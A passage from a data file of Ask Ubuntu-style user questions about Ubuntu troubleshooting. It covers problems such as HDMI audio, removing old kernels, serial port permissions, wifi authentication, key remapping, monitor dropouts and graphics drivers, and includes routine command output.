ocl driver [ selected ] number of devices available for each type : cl_device_type_cpu : 0 cl_device_type_gpu : 0 cl_device_type_accelerator : 0 *** detailed information for each device *** so apparently i need a different driver , but where do i find it ? seems the official drivers by intel are not built for linux .
373080	no hdmi sound on ubuntu 12.04 lts	i 'm very new to ubuntu/linux . i installed ubuntu 12.04 lts on my laptop ( nvidia gpu ) in dual boot , and , with some help from google , i 'm almost ready to go . the only thing that i ca n't figure out is how to play sound trough my hdmi connected to my tv . speakers of the laptop are ok , in the sound settings i can see -hdmi -digital -speaker outputs . the top 2 wo n't play sound so i googled around , found a bunch of things to try but the only thing successful so far was to erase all the drivers from the audio settings and they stayed gone . so finally i re-installed from scratch but still no sound trough hdmi . i tried reinstalling several times , but it did n't work . how can i play sound on my tv connected with hdmi ? i will be glad to give more info if needed cuz this is driving me crazy , thanks for your help in advance !
373082	remove back versions of ubuntu	while installing the most recent version of the kernel , i ran out of disk space . how do i go back and delete all of the old versions of the kernel that are occupying my disk
373090	ubuntu server 13.10 and firebird 2.5	today i decide to upgrade my ubuntu server from 13.04 to 13.10 . when finished i loose the possibility to remotely connect to firebird ( works locally / 127.0.0.1 ) ! i do n't changed anything in the configuration and i do n't understand why this happens . i use webmin remotely to configure the firewall ( iptables ) and the other resources in the server . i have several other services that works correctly ! please i need same help . thanks in advance ! jorge mota
373095	wubi failure win7 : pylauncher failed	several attempts to install ubuntu using wubi were unsucessful : message says failed to launch pylauncher tried to launch wubi from several partitions none attempt was successful system is win7 ubuntu was installed earlier , but a defragmentation distroyed it partition was reformated using win7 -- fortuntely win7 works ok what can i do to install ? i need ubuntu emma
373096	how to permanently change permissions for /dev/ttys0	my system is ubuntu 13.04 and works fine , but i had to installed virtuabox to guest windows xp which is essential tu run an application that dialogues with an alarm set by a usb-to-serial adapter . virtualbox uses ttys0 as serial port and the communication can start efficiently only if command sudo chmod 666 /dev/ttys0 is given to terminal . every time i boot ubuntu , ttys0 file permissions return to default values and i have to run chmod every time i boot-up . my question is : how can i change /dev/ttys0 file permission permanently ? if this is not a good practice , are there other manners to solve the issue ?
373097	yesod on ubuntu 13.10	using ubuntu 13.10 on a lenovo e135 , i 've installed the haskell package and the yesod helper package via ubuntu software center . installation was success . but if i want to create an yesod project with `` yesod init '' and `` yesod devel '' as provided in the quick start guid at yesod web site , this failed . error message told something about `` cabal install failed during configuration step on library xy ... exitcode 1 '' which caused some dependencies to be unresolved but needed for the yesod project to compile . i 've tried also to install haskell via ubuntu software center and yesod via cabal with the same result ( but different libraries indicated in the error message ) . thanks for help hans
373098	which distribution to choose while downloading skype from its official site for ubuntu 13.10 ?	there is download link for skype for ubuntu 10.04 and 12.04 . i ca n't find appropriate version for 13.10 . i tried from terminal to instal too : sudo apt-get install skype but it says unable to locate package skype . and for those who are in hurry to mention this question as possible duplicate , read this properly : i want proper download of latest skype version for ubuntu 13.10 . it 's `` 13.10 '' .
373099	making a partition bootable	i used testdisk to recover my partitions after a long list of poor decisions and mishaps . now when i rebuilt my partitions , i was unable to select one of the partitions as bootable ( * ) . i was forced to choose all my partitions as primary ( p ) . now i have a windows partition which i want to make bootable . i played around in the windows command prompt with my limited knowledge and tried to make the windows os partition active . the error returned was `` not a fixed mbr partition '' or something like that . what should i do ? should i try to deep search with testdisk again or try something with gparted . i want to avoid the former option because it takes hours to finish a deep search . thanks very much .
373100	placing the taskbar	i successfully installed u13.04x64 at first attempt . then i tried to move the taskbar to the bottom of the screen - to no avail . i twisted and turned but could n't do it for my life , and ended up uninstalling u and installing mint . was i chasing a ghost ? thanks , rc
373105	can a single nautilus window be started with multiple tabs ? ( revised )	this question is asked before here and i will ask it here again . i would like nautilus to start with multiple tabs open . how can i do this ? according to the previous question , asked in 2011 , nautilus was not yet able to this . my question has this changed ? if no does someone body have a clue how you can create a script such that nautilus starts with multiple tabs . the answer in the question of 2 years ago namely suggests that it is possible . unfortunately his code is not online anymore .
373116	about removing old kernels	i am trying to remove my used kernels since my /boot is going low . here i have a chicken and egg problem . first i try to remove the kernel with command : sudo apt-get autoremove linux-image- ... and sudo apt-get -y purge ... it gave me error that you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : then i run apt-get -f install , then got the error that /boot has no space left . so how can first release some space under /boot ? i do n't want to rudely delete the files under /boot anyway .
373117	back/red/pink screen with cursor after fresh install	similar questions have been asked before , but this is quite an exotic case , and i 've tried all the other solutions i found . i installed ubuntu 13.10 from usb and afterwards rebooted . at first i got a black screen with a cursor . i googled , and found i need the proprietary driver or use nomodeset . the latter does n't make any difference whatsoever . i ran jockey-text -l which listed kmod : nvidia_173 , so i proceeded to jockey-text -e kmdo : nvidia_173 . it is now listed as enabled but not in use . but lsmod does show a nvidia module loaded . anyway , after installiing the driver i rebooted and was promted with a red screen.this turned pink after pressing the power button . hitting enter did indeed shut the machine down . another reboot later it just starts out pink . another reboot later , no grub fiddling this time , it starts pink but now is back to black . i kid you not . the video card is a nvidia geforce fx 5700 . not using fancy hardare accelerated 3d unity shizzle would be an accepted solution in this case . [ edit ] i stopped keeping track of colors . i also had white and yellow now . trying to get unity-2d going .
373118	ubuntu 12.04 - freezes and displays error `` could not write bytes : broken pipes ''	i 've just installed ubuntu 12.04 on my laptop alongside windows 7 x64 ( laptop has 8gb ram , 750gb gb hdd , and nvidia graphics card , intel i7 processor -asus brand ) . it boots up just fine with grub and i can log in and everything , but the problem is that it will randomly freeze for no apparent reason ( mousepad does n't work , no keys will register ) , after a few minutes of it being frozen , the screen will go black and display the error `` could not write bytes : broken pipe '' then it brings me back to the account log-in screen . any suggestions on what could be going wrong here ? thanks !
373122	installing ubuntu in efi mode cant go beyond grub menu	i created a liveusb of ubuntu 12.04.3 lts using pendrive linux . created a separate 30gb partition using windows 8 disk management disabled secure boot ( did n't find an option to disable efi boot ) disabled fast startup the laptop starts the grub menu shows up but it does n't go beyond that no matter what option i choose . after choosing any option the screen goes blank but the power is still on i can see the power light . my laptop is : hp-n012tx processor- intel i5 4200u video card- 2gbnvidia 740m the grub menu i see :
373126	lubuntu , samba wont let me share folder on a separete disk drive	i made a new samba share on a drive that i mount manually using the gui version ( has always worked for me so i use it ) . i tested to make sure samba was working so i made a share in my documents folder called test and connected to it with my laptop and all was good so i go ahead a tried sharing the `` jobs '' folder with samba . the `` jobs '' folder is on that manually mounted disk drive . so it turns out that samba will put up the connection so i can see the share and connect to it but it gives access denied even though all permissions on samba ( open to everyone ) and on the file system ( ext4 ) are completely open . i have heard that this may be an selinux thing . the unfortune truth being that i dont know anything about selinux other than that it 's name means secure linux . is there someone out there who has had this problem before ? i feel like surely people before me have wanted to share a mounted drive before but i cant find this anywhere on the web . thanks in advance
373129	new samsung ( np550p5c-a08uk ) notebook > just installed ubuntu 13.10 > sound lacks depth that windows had !	i got this new notebook a couple of months ago , with windows 8 loaded , long story short i hated windows 8 , so decided to go back to ubuntu which i had used successfully on other machines . having installed 13.10 , updated and rebooted i was disappointed with the sound quality so i dug around a little ; samsung 's own tech specs show the machine as having : hd audio soundaliveâ˘ jbl 3 speakers ( with sub-woofer ) i 'm certainly not getting an hd soundalive sound with sub-woofer b-lines . on looking around further i 'm led to believe that `` soundalive '' is a samsung implementation of realtek , and on delving still further i note there is a download on the realtek site ( http : //www.realtek.com/downloads/downloadsview.aspx ? langid=1 & pnid=14 & pfid=24 & level=4 & conn=3 & downtypeid=3 & getdown=false ) for their linux/unix hd audio codec driver ... i downloaded the 3.0 ( ver 5.18 ) file and tried to install ... having had to correct the path of the ./configuration script it seemed to work ( certainly lots of activity in terminal anyway ) , but on rebooting and testing i found absolutely no sound at all , so i opted for another clean install of 13.10 , which is where i am now . is anyone able to assist in getting my sound back to somewhere comparable with how windows seemed to manage it , not that i am at all a fan of windows , just a fan of good sound quality which was one of the main reasons in choosing this notebook with jbl speakers in the first place . many thanks in eager anticipation .
373131	can i make ubuntu lighter weight just by removing programs ?	i 'm wondering if it 's possible to make ubuntu lighter in weight by just removing programs from the software center . i 'm trying put together something based on ubuntu that 's similar to chrome/chromium os where i 'm just running a web browser , file manager , and movie player . my question is , would uninstalling unnecessary programs from the software center get rid of pretty much everything i do n't need ?
373132	wifi re-prompts to ask for password repeatedly ( kubuntu 13.10 fresh )	when i type in a password , it seems to ignore it , and ask for it again . can not connect to any connections , all solutions on other threads do not work . i am right next to the router , and i am 100 % sure i am using the right password . encryption type is tkip . output of dmesg | tail -n 20 : 2945.355298 ] wlan0 : send auth to b4:82 : fe:40:70:9d ( try 1/3 ) [ 2945.357272 ] wlan0 : authenticated [ 2945.357475 ] rtl8192se 0000:02:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 2945.357480 ] rtl8192se 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 2945.357484 ] rtl8192se 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 2945.359966 ] wlan0 : associate with b4:82 : fe:40:70:9d ( try 1/3 ) [ 2945.361772 ] wlan0 : rx assocresp from b4:82 : fe:40:70:9d ( capab=0x411 status=0 aid=5 ) [ 2945.364342 ] wlan0 : associated [ 2953.842003 ] wlan0 : deauthenticated from b4:82 : fe:40:70:9d ( reason : 1 ) [ 2953.865369 ] cfg80211 : calling crda to update world regulatory domain [ 2953.871595 ] cfg80211 : world regulatory domain updated : [ 2953.871604 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2953.871609 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2953.871614 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2953.871618 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 2953.871622 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2953.871627 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 39035.905880 ] type=1400 audit ( 1383976159.190:32 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=3800 comm= '' apparmor_parser '' [ 39035.905893 ] type=1400 audit ( 1383976159.190:33 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=3800 comm= '' apparmor_parser '' [ 39035.906908 ] type=1400 audit ( 1383976159.190:34 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=3800 comm= '' apparmor_parser '' v
373136	micro sd card write protected fat32 ?	i have tried this solution and it doesnt work . sudo fdisk -l output is disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0004a414 device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 759897456 379589304+ 7 hpfs/ntfs/exfat /dev/sda3 759898110 1465147391 352624641 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 1448615936 1465147391 8265728 82 linux swap / solaris /dev/sda6 759898112 1448615935 344358912 83 linux partition table entries are not in disk order disk /dev/sdb : 3960 mb , 3960471552 bytes 31 heads , 30 sectors/track , 8317 cylinders , total 7735296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 8192 7735295 3863552 b w95 fat32 when apply sudo mount -- options remount , rw /dev/sdb1 says : mount : can not remount block device /dev/sdb1 read-write , is write-protected when apply this : sudo chown -hr waqas /dev/sdb1 it shows changing the permission of files and gives the log files but result is nothing when i goto the card and check the permission its the same . same case with the sudo chmod -r 777 /dev/sdb1 and the last one i apply gksudo nautilus when navigate to the card and try to change the permission it says : and window close after a second . so i am not sure what to do . note : ubuntu 13.10 this card was in android phone and somehow got messed up with the permissions . written on card : micro sd card hc 4gb
373138	specific pendrive not being detected in ubuntu 12.04 after making it bootable	my ubuntu is unable to recognize the transcend usb pen-drive . this problem is persisting since i had made it bootable to install the windows xp on other pc . before this , it was working fine and being detected . interesting thing is that all the other pen-drives are being detected except that of mine . when i am running lsusb command in the terminal it is showing that the pen-drive is inserted . the output is as in the terminal : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 007 : id 15d9:0a4f trust international b.v . bus 001 device 009 : id 1a2c:0021 bus 001 device 005 : id 0c45:6473 microdia bus 002 device 010 : id 8564:1000 the last line in the result is my pendrive . seeking help ! !
373139	can ubuntu will be installed on samsung omnia w ?	i like ubuntu very much and appreciate your work . but i wan na install it on my samsung omnia w gt i 8350. which is now running windows phone 7.8 .which sucks . please tell me if ubuntu can be installed on it ?
373140	how to re-activate the gui of a app ?	i have ticked the option minimize to system tray for the app minbar . now i ca n't run the gui interface of the program . when i click the icon , the program runs cause i can use the pidof command and see the process id . but i ca n't bring up the gui of the app . how do i bring that back ?
373141	how to remap fn key combinations ( lenovo g500 )	i am running kubuntu 13.10 on a lenovo g500 laptop . my question is similar to this one : how can i remap my f keys on my hp laptop ? that is to say , my f1-f12 keys are mapped to certain special functions , and only holding down the fn key restores access to the standard f1-f12 keys . how do i remap certain keys ? i would like to know if there is a way to remap fx to fn+fx and vice-versa . as per the instructions of # 87043 i checked my bios and there is no option to switch the fx/fn key functionality . googling through leonovo 's support forums indicates a bios update enabling this is in the works , but there 's no indication of when it will be complete . using xev i was able to see what x sees when f1-f12 are pressed . some send separate keycodes , but some are somehow mapped to key combinations or other unknown things : f1 - xf86audiomute f2 - xf86audiovolumelower f3 - xf86audiovolumeraise f4 - alt_l + f4 f5 - f5 f6 - disables touchapd , can not quite understand what xev tells me is happening , reenables if disabled ( kernel log reveals these have well-defined scancodes not assigned to any keycodes ) f7 - xf86wlan f8 - alt_l + ctrl_l + tab f9 - turns off lcd backlight , xev sees nothing f10 - super_l + p f11 - xf86monbrightnesslower f12 - xf86monbrightnessraise following the instrusctions on this page : how do i remap certain keys ? i remapped all the keys that have definite keycodes ( f1 , f2 , f3 , f5 , f7 , f11 , f12 ) this still leaves the f4 , f6 , f8 , f9 , f10 keys not functioning properly . this is especially frustarting since f4 , f6 , f9 now kill the current window , the touchpad and screen , respectively . any help on remapping these keys to their proper functions would be much appreciated ! -anatoli xev output for these 5 keys : f4 keypress event , serial 40 , synthetic no , window 0x4800001 , root 0x9d , subw 0x0 , time 3674037 , ( 228,298 ) , root : ( 911,321 ) , state 0x0 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false focusout event , serial 40 , synthetic no , window 0x4800001 , mode notifygrab , detail notifyancestor focusin event , serial 40 , synthetic no , window 0x4800001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 40 , synthetic no , window 0x0 , keys : 4294967197 0 0 0 0 0 0 0 65 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 keyrelease event , serial 40 , synthetic no , window 0x4800001 , root 0x9d , subw 0x0 , time 3674040 , ( 228,298 ) , root : ( 911,321 ) , state 0x8 , keycode 70 ( keysym 0xffc1 , f4 ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4800001 , root 0x9d , subw 0x0 , time 3674042 , ( 228,298 ) , root : ( 911,321 ) , state 0x8 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false clientmessage event , serial 40 , synthetic yes , window 0x4800001 , message_type 0x12a ( wm_protocols ) , format 32 , message 0x12b ( wm_delete_window ) f6 disabling touchpad mappingnotify event , serial 40 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 focusout event , serial 40 , synthetic no , window 0x4600001 , mode notifygrab , detail notifyancestor focusin event , serial 40 , synthetic no , window 0x4600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 40 , synthetic no , window 0x0 , keys : 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 mappingnotify event , serial 41 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 f6 enabling touchpad mappingnotify event , serial 42 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 focusout event , serial 42 , synthetic no , window 0x4600001 , mode notifygrab , detail notifyancestor focusin event , serial 42 , synthetic no , window 0x4600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 42 , synthetic no , window 0x0 , keys : 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 mappingnotify event , serial 43 , synthetic no , window 0x0 , request mappingpointer , first_keycode 0 , count 0 f8 doing whatever it is f8 does keypress event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3508985 , ( 13 , -12 ) , root : ( 696,11 ) , state 0x0 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3508986 , ( 13 , -12 ) , root : ( 696,11 ) , state 0x8 , keycode 37 ( keysym 0xffe3 , control_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3508988 , ( 13 , -12 ) , root : ( 696,11 ) , state 0xc , keycode 23 ( keysym 0xff09 , tab ) , same_screen yes , xlookupstring gives 1 bytes : ( 09 ) `` `` xmblookupstring gives 1 bytes : ( 09 ) `` `` xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3508989 , ( 13 , -12 ) , root : ( 696,11 ) , state 0xc , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3508991 , ( 13 , -12 ) , root : ( 696,11 ) , state 0x4 , keycode 37 ( keysym 0xffe3 , control_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3508994 , ( 13 , -12 ) , root : ( 696,11 ) , state 0x0 , keycode 23 ( keysym 0xff09 , tab ) , same_screen yes , xlookupstring gives 1 bytes : ( 09 ) `` `` xfilterevent returns : false f9 gives no output to xev f10 doing whatever it is f10 does keyrelease event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3586076 , ( 9 , -14 ) , root : ( 692,9 ) , state 0x0 , keycode 10 ( keysym 0x31 , 1 ) , same_screen yes , xlookupstring gives 1 bytes : ( 31 ) `` 1 '' xfilterevent returns : false keypress event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3586552 , ( 9 , -14 ) , root : ( 692,9 ) , state 0x0 , keycode 133 ( keysym 0xffeb , super_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3586554 , ( 9 , -14 ) , root : ( 692,9 ) , state 0x40 , keycode 33 ( keysym 0x70 , p ) , same_screen yes , xlookupstring gives 1 bytes : ( 70 ) `` p '' xmblookupstring gives 1 bytes : ( 70 ) `` p '' xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3586557 , ( 9 , -14 ) , root : ( 692,9 ) , state 0x40 , keycode 33 ( keysym 0x70 , p ) , same_screen yes , xlookupstring gives 1 bytes : ( 70 ) `` p '' xfilterevent returns : false keyrelease event , serial 40 , synthetic no , window 0x4600001 , root 0x9d , subw 0x0 , time 3586560 , ( 9 , -14 ) , root : ( 692,9 ) , state 0x40 , keycode 133 ( keysym 0xffeb , super_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false
373142	installing mysql workbench : package python-minimal can not be removed	i am a newbie in linux and ubuntu . i tried to install mysql workbench on ubuntu 12.04.3 . i have downloaded .deb installation file and tried to run it . after double click on file , a dialog appeared with message that package catalog should be repaired . i click to repair it and then i got the message : '' package python-minimal can not be removed '' i am a newbie in linux so i do n't understand how should i go on . can anybody help ? thanks tomas
373143	merging home directories breaks readline/.bashrc	over the last few days , i merged a home directory from a working install of 12.04 to an old home directory , i believe from an install of 10.04 ( it was a bare driv ) i got the new drive to load and mount properly , but when i try and use the .bashrc entries from the 12.04 installation , things like the following alias : alias banana='echo banana' it produces the following errors : -bash : $ '\r ' : command not found -bash : $ '\r ' : command not found -bash : $ '\r ' : command not found : invalid shell option name -bash : $ '\r ' : command not found -bash : $ '\r ' : command not found : invalid shell option name -bash : $ '\r ' : command not found -bash : $ '\r ' : command not found -bash : $ '\r ' : command not found -bash : $ '\r ' : command not found -bash : .bashrc : line 36 : syntax error near unexpected token ` $ 'in\r '' 'bash : .bashrc : line 36 : `case `` $ term '' in i ca n't find the text that is being referenced in that .bashrc file ( it only works when i copy it from /etc/skel , and even then , after adding the alias and sourcing , then removing the alias and sourcing , it still produces the errors . the only way to get bash working again is to re-copy the file from /etc/skel it looks like i ca n't make any alterations to .bashrc without causing these errors . i suspect that it has something to do with readline or .inputrc , which were also having problems ( though these seem to be resolved now ) . as of right now , there 's no .inputrc in the /home/user directory . thanks for any help you can give !
373144	during installation of ubuntu 12.04.3 on 2 year-old toshiba satellite , graphics fails	i recently upgraded to an ssd on a 2-year old toshiba satellite laptop . on this laptop , i had previously installed 12.04 lts , and it installed like a charm . i had tried other linux flavors , but came back to ubuntu as my favorite , so i had installed 12.04 lts at least three times , and each time it had installed quickly and beautifully ( selling me on linux - loved it ) . however now with the new ssd ( which works well with windows ) , when i ran the original 12.04 disc that i usually use for installs , and it hung . so i downloaded the latest version 12.04.3 and during the install ( i 've made several attempts ) the graphics will fail , preventing an installation . below are the specs . any advice ? love ubuntu and would love to get it back on my satellite c655d-s5300 laptop amd e-series processor e-300 windows 7 home premium ( 64-bit ) , sp1 4gb ddr3 memory amd速 integrated graphics 320gb hdd ( 5400rpm , serial ata ) ( replaced with a kingston 120gb ssd ) dvd-supermulti drive ( +/-r double layer ) wi-fi速 wireless networking ( 802.11b/g/n ) no bluetooth ( no antenna ) standard us keyboard with 10-key pad ( black ) touch pad pointing device with multi touch control li-ion ( 48wh , 6-cell ) 2-usb ( 2.0 ) ports
373145	monitor turning off randomly ubuntu 13.10	i have a fresh installation of ubuntu 13.10 with the latest updates on my pc . i am having a issue where the monitor seems to randomly disconnect . i can not pinpoint what is causing this issue . it can happen out of the blue , when i open thunderbird , or when i open an email in my browser , but nothing is consistent . i can not reproduce any of these issues . it will work fine all day and nothing i do n't do anything different when the issue arises . i have installed caffeine and disabled the screensaver , disabled dpms , disabled power save settings/screen dim , and toyed with other xset commands that other 's have had luck with when they had similar issues on previous versions of ubuntu . i have not installed any additional software or drivers other than common apps through the software center . the problem occurred before any installations . i have a dual monitor setup and both monitors lose input at the same time . the tv monitor goes to a blue screen and says `` invalid input '' or `` out of range '' if i recall correctly , and the other monitor switches quickly between digital and analog before eventually resting at an all black screen . replugging the monitor does n't do anything and the only way to get the screen back that i found is to pull the power plug and reboot , then it comes right back up . i 'm tech savvy but a linux amateur . i suppose my next step from here would be to check logs , but i do n't know where to begin . xset -q output : screen saver : prefer blanking : yes allow exposures : yes timeout : 0 cycle : 0 colors : default colormap : 0x20 blackpixel : 0x0 whitepixel : 0xffffff font path : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins dpms ( energy star ) : standby : 0 suspend : 0 off : 0 dpms is disabled pc specs : motherboard : msi ms-7778 , processor : amd a10-5700 with integrated radeon hd gfx monitor setup : dual monitors , vizio e260mv via vga ( tv ) , and samsung syncmaster t220 via dvi .
373147	how to enable natural scroll on two-finger scroll with command while normal scrolling for edge scrolling in ubuntu 13.10 ?	after getting both scroll enabled in ubuntu 13.10 . from following method : enable both two finger scrolling and edge scrolling in ubuntu 13.10 permanantly i want natural scrolling enabled for two-finger scroll and normal scrolling for edge scroll ? i know it 's possible . since , i do n't know how to enable natural scrolling in ubuntu 13.10 , it 's being difficult for me to solve the problem . you can view mentioned link too if you do n't get what i am talking about .
373151	how do i disable the pop-up ?	how i can disable the pop up that appears when i 'm hovering over applications ? example ''
373152	ubuntu server sending massive udp traffic to an ip	we have noticed that several of our ubuntu servers are sending massive amounts of udp traffic to an ip that we do n't recognize . could the server be infected ? how can we find out ? the servers have postfix installed on them . the only open ports on these machines are smtp and pop3 .
373154	'sensors ' command from lm-sensors keeps reporting the same temperature	i 've got a small cluster running ubuntu 12.04 lts on all of the nodes . i recently set up ganglia to monitor the cluster , and it 's working beautifully except for one issue . i wanted to add a cpu temperature metric to the monitor , so i created a 'temps ' function in /usr/local/bin/ that consists of the following line : sensors|grep temp $ 1|awk ' { print $ 2 } '|grep -o ' [ 0-9 . ] \+' i then added the following lines to my crontab to update the temperature every 2 minutes : */2 * * * * /usr/bin/gmetric -- name temp1 -- value `/usr/local/bin/temps 1` -- type int16 -- units celcius */2 * * * * /usr/bin/gmetric -- name temp2 -- value `/usr/local/bin/temps 2` -- type int16 -- units celcius after setting this up , i noticed that the temperature is n't ever changing . it reports 27.8 for temp1 and 29.8 for temp2 all of the time . this is what 'sensors ' is reporting regardless of the load on the machine . here 's the full output from 'sensors ' : root @ nuctest : ~ # sensors acpitz-virtual-0 adapter : virtual device temp1 : +27.8째c ( crit = +106.0째c ) temp2 : +29.8째c ( crit = +106.0째c ) what am i missing here ? thanks .
373155	unity window colors are corrupt	installed 13.04 over 10.10 by erasing and installing over . unity seems to be corrupted - should the unity window be transparent ? the window i get is like the video is corrupted , all jagged and varying colors . the icons are ok though , just hard to see . how can i fix this ? any help would be appreciated . oh , the window for shutdown or restart has the same weird background . thanks , duane .
373157	how can i install gnome-photos in 13.10 ?	using 13.10 unity , how can i install gnome-photos from gnome 3.10 ? here 's a sample package from fedora : http : //koji.fedoraproject.org/koji/packageinfo ? packageid=15095 i added this repo http : //www.ubuntuupdates.org/ppa/gnome_3 ? dist=saucy but still it can not be found : apt-get install gnome-photos reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gnome-photos thanks !
373158	files that were deleted are still taking up space on hdd but are not in trash- ubunt 12.10	this is the first time i have encountered this problem with ubuntu 12.10 i am trying to restore data from an external hard drive using testdisk 6.14 . there were read problems so i aborted the app . i did manage to get about 80gb recovered to a temp directory in my home folder . when i tried to delete this temp directory , i had to open caja as root from a terminal ( i am using the mate de ) in order to have the permission . once the temp directory was deleted there should have been about 95gb free on my system partition . but it 's only showing 35gb free . i know this is incorrect as i checked the total amount of freespace on the partition before restoring data from the external drive to my system partition to make sure there was room . there was 95gb free . i used the direct delete function . so these files should not have gone to the trash folder . i can not seem to open the trash folder as caja root . i get an error saying the file can not be accessed . so i can not tell if the files are somehow stuck in the trash . can anyone tell me what might be happening here ? why is there apparently now about 60gb of `` invisible data '' taking up space on my system drive ? how do i access the root trash folder to make sure it 's really empty ? if this `` invisible data '' is not in the root trash folder than how do i find it and delete it ? hope someone can help me with this .
373161	juju boostrap for ec2 fails with access denied , but working credentials	to make a long story short , i 'm using s3cmd to manipulate s3 buckets and have copied the access credentials over to my environments.yaml under a new `` smlamazon '' section , but this fails at bootstrap with access denied : mitchy $ s3cmd ls 2013-11-08 18:49 s3 : //sml-juju 2012-11-27 14:38 s3 : //sml-public 2013-05-27 15:45 s3 : //sml-website-backups mitchy $ juju bootstrap -- constraints `` cpu-power=0 mem=512m '' -v verbose is deprecated with the current meaning , use show-log 2013-11-08 18:53:53 info juju.environs open.go:156 environment info already exists ; using new not prepare 2013-11-08 18:53:53 info juju.provider.ec2 ec2.go:193 opening environment `` smlamazon '' 2013-11-08 18:53:54 error juju supercommand.go:282 access denied i essentially copied the `` amazon '' block and renamed it `` smlamazon '' , and updated the access and secret keys ( and s3 and admin secret ) for it . what am i missing ?
373163	installing bumblebee - kernel issues	i 'm fairly new to linux and i 'm currently running linux mint 13 ( based on ubuntu 12.04 ) . i 'm trying to install bumblebee with preferably the latest stable nvidia 319 drivers on my asus r505cb ( this specs , but with gt740m instead of the gt635m ) . i 've been trying a lot of things the past two days without succes . with nouveau only the integrated graphics are working and when i install any version of the nvidia driver ( both via the nvidia website and ppa 's ) cinnamon ca n't start and i get this error when i start nvidia x server settings : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . now , trying to install bumblebee once again i see i apparently overlooked this line on this wiki : if on 12.04.3 , replace linux-headers-generic with linux-headers-generic-lts-raring . how do i do this ? i have currently installed the 3.12 linux kernel ( had 3.2 , which was default ) . 1 ) i guess i have to use this 3.8 kernel instead of the 3.12 version to make bumblebee work ? 2 ) when i tried installing it , it installed these packages : linux-headers-generic-lts-raring linux-image-3.8.0-33-generic linux-image-generic-lts-raring but it does n't place a .bin file in the /boot folder so when i run sudo update-grub it would n't detect this 3.8 kernel and i 'm still using the 